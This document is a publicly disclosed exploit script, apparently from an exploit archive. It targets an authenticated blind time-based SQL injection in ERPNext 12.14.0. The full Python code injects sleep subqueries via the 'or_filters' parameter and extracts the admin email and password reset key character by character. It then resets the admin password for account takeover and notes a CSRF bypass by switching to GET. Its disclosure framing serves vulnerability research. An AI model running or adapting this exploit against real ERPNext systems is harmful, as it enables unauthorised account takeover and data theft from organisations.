# Source: https://sploitus.com/exploit?id=PACKETSTORM:161063
# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)  
# Date: 21-01-21  
# Exploit Author: Hodorsec  
# Vendor Homepage: http://erpnext.org  
# Software Link: https://erpnext.org/download  
# Version: 12.14.0  
# Tested on: Ubuntu 18.04  
  
#!/usr/bin/python3  
  
# AUTHENTICATED SQL INJECTION VULNERABILITY  
# In short:  
# Found an authenticated SQL injection, exploitable as a low-privileged user, because the parameters "or_filters" and "filters" are not sanitized sufficiently. Although several sanitization and blacklist checks are applied in the code to other parameters, these two parameters aren't checked. This allows, for example, retrieving the admin reset token and resetting the admin account with a new password, as shown in the PoC.
#  
# Longer story:  
# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.  
# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.  
# Initially, the requests were performed using the HTTP POST method, which checks for a CSRF token. However, when the request is converted to an HTTP GET, the CSRF token is neither required nor checked.
# Test environment:  
# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.  
# Cause:  
# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.  
  
# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY  
# 1. Create account  
# 1.a. Use update-password link for created user received via mail  
# STEPS INCLUDED IN SCRIPT  
# 1. Login using existing low-privileged account  
# 2. Use SQL Injection vulnerability in "frappe/frappe/model/db_query/get_list" function, which does not sanitize parameters "filters" and "or_filters" sufficiently
# 3. Retrieve reset key for admin user  
# 4. Reset admin account using given password  
  
# DEMONSTRATION  
# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2  
# [*] Got an authenticated session, continue to perform SQL injection...  
# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...  
# admin@nowhere.local  
# [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1  
# [*] Sent reset request for 'admin@nowhere.local'
# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...  
# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX  
# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1  
# [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'  
# [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111!  
#   
# [+] Done!  
  
import requests  
import urllib3  
import os  
import sys  
import re  
  
# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
# Export the same value under both the lower- and upper-case variable names
os.environ.update(
    dict.fromkeys(
        ("http_proxy", "HTTP_PROXY", "https_proxy", "HTTPS_PROXY"),
        proxy,
    )
)
  
# Silence urllib3's InsecureRequestWarning: every request in this script is
# sent with verify=False, so the warning would otherwise be raised per call
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  
# Timeout value handed to every HTTP call in this script
timeout = 30

# Fixed text placed before and after the conditional part of the probe string
inj_prefix = '["select(sleep('
inj_suffix = '))))"]'

# Code points of the decimal digits "0" and "9"
dec_begin, dec_end = ord("0"), ord("9")

# Code points of the first and last printable ASCII characters (" " and "~")
ascii_begin, ascii_end = ord(" "), ord("~")
  
# Handle CTRL-C
def keyboard_interrupt():
    """Report that the user interrupted the run and terminate the process.

    Raises:
        SystemExit: always, with exit code 0.
    """
    print("\n\n[*] User requested an interrupt, exiting...")
    # sys.exit is used rather than the site-provided exit() helper, which is
    # meant for interactive sessions and may be absent (e.g. python -S)
    sys.exit(0)
  
# Custom headers
def http_headers():
    """Return the HTTP headers sent with the script's requests.

    Returns:
        dict: a newly created dictionary holding a single ``User-Agent``
        entry.
    """
    return {
        'User-Agent': "Mozilla",
    }
  
# Get an authenticated session
def get_session(url, headers, email, password):
    """Log in with the given credentials and return the session used.

    Args:
        url: URL the login form data is posted to.
        headers: HTTP headers sent with the request.
        email: Login name, sent as the ``usr`` form field.
        password: Password, sent as the ``pwd`` form field.

    Returns:
        The ``requests`` session object the login request was made with.

    Raises:
        SystemExit: with code -1 when the response body does not contain
            the text ``full_name``.
    """
    data = {
        'cmd': 'login',
        'usr': email,
        'pwd': password,
        'device': 'desktop',
    }
    session = requests.Session()
    r = session.post(url, headers=headers, data=data, timeout=timeout,
                     allow_redirects=True, verify=False)
    # The login is treated as successful only when the body mentions "full_name"
    if "full_name" not in r.text:
        print("[!] Unable to get an authenticated session, check credentials...")
        sys.exit(-1)
    return session
  
# Perform the SQLi call for injection
def sqli(url, session, headers, inj_str, sleep):
    """Send one GET request carrying *inj_str* and report whether it was slow.

    Args:
        url: URL the request is sent to.
        session: Session object whose ``get`` method performs the request.
        headers: HTTP headers sent with the request.
        inj_str: Value placed in the ``or_filters`` query parameter.
        sleep: Threshold in seconds that the response time is compared to.

    Returns:
        bool: True when the elapsed time of the response is at least
        *sleep* seconds, False otherwise.
    """
    inj_params = {
        'cmd': 'frappe.model.db_query.get_list',
        'filters': '["idx=1"]',
        'or_filters': inj_str,
        'fields': 'idx',
        'doctype': 'Report',
        'order_by': 'idx',
        'group_by': 'idx',
    }

    # Do GET
    r = session.get(url, params=inj_params, headers=headers,
                    timeout=timeout, verify=False)
    # The two comparisons in the original (>= and <) were exhaustive, so a
    # single boolean expression yields the same result
    return r.elapsed.total_seconds() >= sleep
  
# Loop through positions and characters
def get_data(url, session, headers, prefix, suffix, row, column, table, username, sleep):
    """Recover one column value character by character via timed requests.

    For each position the function first asks whether the character code is
    greater than ``ascii_begin``; a False answer ends the extraction. It then
    tries every code from ``ascii_begin`` to ``ascii_end`` with an equality
    test and keeps the first one that ``sqli`` reports as True. Each
    recovered character is printed as soon as it is found.

    Args:
        url: URL passed through to ``sqli``.
        session: Session object passed through to ``sqli``.
        headers: HTTP headers passed through to ``sqli``.
        prefix: Text prepended to every probe string.
        suffix: Text appended to every probe string.
        row: Row offset used in the ``LIMIT`` clause of the probe.
        column: Column name inserted into the probe.
        table: Table name inserted into the probe.
        username: Username inserted into the probe's ``where`` clause.
        sleep: Delay value embedded in the probe and used as the threshold.

    Returns:
        str: The characters recovered, at most ``max_pos_len - 1`` of them.
    """
    max_pos_len = 35

    def build_probe(pos, direction, value):
        # Single place where the probe text is assembled; both the
        # "is there a character here" test and the per-character test use it
        return (prefix + inj_prefix + str(sleep)
                + "-(if(ord(mid((select ifnull(cast(" + column
                + " as NCHAR),0x20) from " + table
                + " where username = '" + username
                + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))"
                + direction + str(value) + ",0," + str(sleep)
                + inj_suffix + suffix)

    extracted = ""
    # Loop through length of string
    # Not very efficient, should use a guessing algorithm
    for pos in range(1, max_pos_len):
        # Test if current pos does have any valid value. If not, break
        if not sqli(url, session, headers, build_probe(pos, ">", ascii_begin), sleep):
            break
        # Loop through ASCII printable characters
        for guess in range(ascii_begin, ascii_end + 1):
            if sqli(url, session, headers, build_probe(pos, "=", guess), sleep):
                extracted_char = chr(guess)
                extracted += extracted_char
                print(extracted_char, end='', flush=True)
                break
        # NOTE(review): when no guess matches, nothing is appended for this
        # position and the loop simply moves on to the next one
    return extracted
  
  
def forgot_password(url, headers, sqli_email):
    """Submit a password-reset request for *sqli_email*.

    Args:
        url: URL the form data is posted to.
        headers: HTTP headers sent with the request.
        sqli_email: Value sent as the ``user`` form field.

    Returns:
        The response object when its body contains the confirmation text
        "Password reset instructions have been sent to your email",
        otherwise None.
    """
    data = {
        'cmd': 'frappe.core.doctype.user.user.reset_password',
        'user': sqli_email,
    }
    r = requests.post(url, headers=headers, data=data, verify=False,
                      allow_redirects=False, timeout=timeout)
    if "Password reset instructions have been sent to your email" in r.text:
        return r
    return None
  
def reset_account(url, headers, sqli_email, sqli_reset_key, new_password):
    """Submit *new_password* together with the reset key.

    Args:
        url: URL the form data is posted to.
        headers: HTTP headers sent with the request.
        sqli_email: Not used by the request; kept so the signature stays
            unchanged for callers.
        sqli_reset_key: Value sent as the ``key`` form field.
        new_password: Value sent as the ``new_password`` form field.

    Returns:
        The response object when its status code is 200, otherwise None.
    """
    data = {
        'key': sqli_reset_key,
        'old_password': '',
        'new_password': new_password,
        'logout_all_sessions': '0',
        'cmd': 'frappe.core.doctype.user.user.update_password',
    }
    r = requests.post(url, headers=headers, data=data, verify=False,
                      allow_redirects=False, timeout=timeout)
    if r.status_code == 200:
        return r
    return None
  
# Main
def main(argv):
    """Run the proof of concept from the command line.

    The six positional arguments are read from ``sys.argv`` directly: login
    e-mail, login password, username to reset, new password, target URL and
    sleep time in seconds.

    Steps performed: log in, read the ``name`` column of ``tabUser`` for the
    given username, request a password reset for that value, read the
    ``reset_password_key`` column, then submit the new password with the key.

    Args:
        argv: Accepted for interface compatibility with existing callers;
            the function does not read it.

    Raises:
        SystemExit: with code 0 after printing usage when the argument count
            is wrong or after a keyboard interrupt; with code -1 when a step
            fails or a request error occurs.
    """
    if len(sys.argv) != 7:
        print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
        print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")
        sys.exit(0)

    email, password, username, new_password, url = sys.argv[1:6]
    sleep = int(sys.argv[6])

    # Fixed request headers
    headers = http_headers()

    # Sleep divide by 2 due to timing caused by specific DBMS query
    sleep = sleep / 2

    # Optional prefix / suffix
    prefix = ""
    suffix = ""

    # Tables / columns / values
    table = 'tabUser'
    columns = ['name', 'reset_password_key']
    sqli_email = ""
    sqli_reset_key = ""

    # Rows
    rows = 1

    # Do stuff
    try:
        # Get an authenticated session
        session = get_session(url, headers, email, password)
        if session:
            print("[*] Got an authenticated session, continue to perform SQL injection...")

        # Getting values for found rows in specified columns
        for column in columns:
            print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
            retrieved = ""
            for row in range(0, rows):
                retrieved = get_data(url, session, headers, prefix, suffix, row, column, table, username, sleep)
                print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
            if column == 'name':
                sqli_email = retrieved
                # Generate a reset token in database
                if forgot_password(url, headers, sqli_email):
                    print("[*] Sent reset request for '" + sqli_email + "'")
                else:
                    print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
                    sys.exit(-1)
            elif column == 'reset_password_key':
                sqli_reset_key = retrieved

        # Print retrieved values
        print("[+] Retrieved email '" + sqli_email + "' and reset key '" + sqli_reset_key + "'")

        # Reset the desired account
        if reset_account(url, headers, sqli_email, sqli_reset_key, new_password):
            print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
        else:
            print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
            sys.exit(-1)

        # Done
        print("\n[+] Done!\n")
    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        sys.exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        sys.exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        sys.exit(-1)
    except requests.exceptions.HTTPError as e:
        # Must precede RequestException, its base class, to be reachable.
        # The status lives on the attached response, which may be None.
        status = e.response.status_code if e.response is not None else "unknown"
        print("[!] Failed with error code - " + str(status) + "\n")
        sys.exit(-1)
    except requests.exceptions.RequestException as e:
        print("[!] " + str(e))
        sys.exit(-1)
    except KeyboardInterrupt:
        # keyboard_interrupt() terminates the process itself
        keyboard_interrupt()
  
# If we were called as a program, go execute the main function.
if __name__ == "__main__":
    main(sys.argv[1:])
  
# Timeline:  
# 22-12-20: Sent initial description and PoC via https://erpnext.com/security  
# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.  
# 21-01-21: No response received, public disclosure